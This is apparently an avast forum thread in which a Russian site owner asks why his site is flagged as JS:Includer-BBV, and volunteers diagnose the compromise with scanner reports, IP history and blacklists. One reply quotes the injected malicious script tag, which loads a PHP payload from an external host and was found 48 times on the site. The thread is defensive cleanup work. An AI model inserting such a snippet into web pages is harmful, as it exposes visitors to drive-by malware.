Need help: JS:Includer-BBV [Trj]

http://diveistochnik.ru

avast reports:

URL: hxxp://www.diveistochnik.ru/|{gzip}
Заражение: JS:Includer-BBV [Trj]

Is it really infected? What can I do to make avast not reporting this?

https://www.virustotal.com/en/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/1417795220/
http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417795190

https://forum.avast.com/index.php?topic=53253.0

What can I do to make avast not reporting this?
Don't try to visit it.

IP history - many domains on same IP and many are blacklisted https://www.virustotal.com/nb/ip-address/90.156.201.12/information/

114 websites hosted on that IP http://www.urlvoid.com/ip/90.156.201.12

I am owner of this site, now it is at 90.156.201.42

http://www.ipvoid.com/scan/90.156.201.42/

Isn’t any better there

I removed malicious link inside the file: http://diveistochnik.ru/O_CLUBE/index1.htm

reported by http://zulu.zscaler.com

is it not enough?

Thank you, I will write to hosting support.

Your Previous score was 52/100 (Susipicous) remains pretty much unchanged.

http://zulu.zscaler.com/submission/show/eed116143a72268c96d3425c6a81474f-1417798051

After the index1.html file, you still have a CSS file and 2 HTM files.

If you hang for a bit, I shall ask Polonus to help you track the issue(s)

Yes, of course.

46 websites on that IP http://www.urlvoid.com/ip/90.156.201.42 and many blacklisted

IP history https://www.virustotal.com/nb/ip-address/90.156.201.42/information/

maybe the IP is not static, it is shared by many sites. now it is at 90.156.201.32

http://www.urlvoid.com/ip/90.156.201.32
https://www.virustotal.com/nb/ip-address/90.156.201.32/information/

IP’s don’t change that fast!!

I checked it on VirusTracker and up came: diveistochnik dot ru,90.156.201.32,ns1.masterhost dot ru,Multiple IPs,
See: http://www.worldguide.pt/clean-mx/viruses.php?domain=adversa.ru&response=
Persistent overdue malware used in PHISH-ing: http://support.clean-mx.de/clean-mx/phishing.php?netname=MASTERHOST-HOSTING&sort=id%20DESC%20&response=alive
See: https://www.virustotal.com/nl/url/21c14c9f78d26884c038e6c15f087fc994f04d7c0a09299d08093e7b39f61b84/analysis/
Also consider on IP: https://www.mywot.com/en/scorecard/90.156.201.12?utm_source=addon&utm_content=popup
Virus mails, spam mails and phishing mails: http://www.robtex.net/en/advisory/ip/90/156/201/12/
All the info we need here we find via the Quttera scan of that website:
Malicious code found →

[[<!--f24624--><script type="text/javascript" src="htxp://aleksandr-motovilov.ru/qmxbjd7n.php?id=3692514"></script><!--/f24624-->]]   

48 instances of this, see: http://quttera.com/detailed_report/diveistochnik.ru
blacklisted external links: diveistochnik dot ru/javascript:window[
diveistochnik dot ru/about:blank
Yandex blacklisted: More information

Yandex periodically checks websites to warn users about harmful webpages. The last check (less than two days ago) showed that this site contains malware. This can happen either in accordance with the owner’s intent or due to the tampering of fraudsters.

Malware:

includes websites blacklisted by Yandex for distributing malware,
contains exploit (according to the Yandex behavior analyzer);
contains Troj/JSRedir-NZ (data provided by Sophos).
How Yandex verifies sites

Examples for Troj/JSRedir-NZ listed here: http://support.clean-mx.de/clean-mx/viruses.php?virusname=Troj/JSRedir-NZ&sort=id%20DESC

polonus

Hi Michael,

Site has hotlog and that is why it could have been compromised like with this: http://forums.cpanel.net/f5/warning-downloadable-shell-exploit-52043-print.html
See: htxp://diveistochnik.ru/O_CLUBE/index1.htm
As this is fortunately blocked by an extension in my browser: htxp://hit8.hotlog.ru/cgi-bin/hotlog/count

polonus

P.S. for the IPs verify this at domain hosting history - Peter Kleissner’s scan gave me multiple IP domain as a result.
So we check here: http://toolbar.netcraft.com/site_report?url=http://diveistochnik.ru&refresh=1#history_table
See hosting history: Netblock owner IP address OS Web server Last seen
Masterhost.ru is a hosting and technical support organization. 90.156.201.42 FreeBSD Apache 5-Dec-2014
Masterhost.ru is a hosting and technical support organization. 90.156.201.32 unknown Apache 23-Jul-2011
Re: http://whois.domaintools.com/diveistochnik.ru

Damian

And he’s here! I would take his advice for what it is. He’s quite smart :-). He’s been doing this for a few years :slight_smile:

THank you Polonus!

Hi Michael,

You are welcome. Like to thank you also for the inspiration, we as users here inspire each other and we grow abilities in doing this together.
As Yandex produces Troj/JSRedir-NZ via SOPHOS and that equals avast’s JS:Includer-BBV [Trj] detection, we already have solved the greater part of this riddle.
Furthermore as we can establish that the code for this detection is still there and we can point to that we know enough.

Then analyzing what is on that site at http://fetch.scritch.org/ made me stumble on the term hotlog going over some script found there and then the online link with the possible exploit method was an additional bonus when going all through this.

That is more or less my line of reasoning here, helped by my dissecting experience from years and years. Just explain all this so you can track this back for educational purposes.

polonus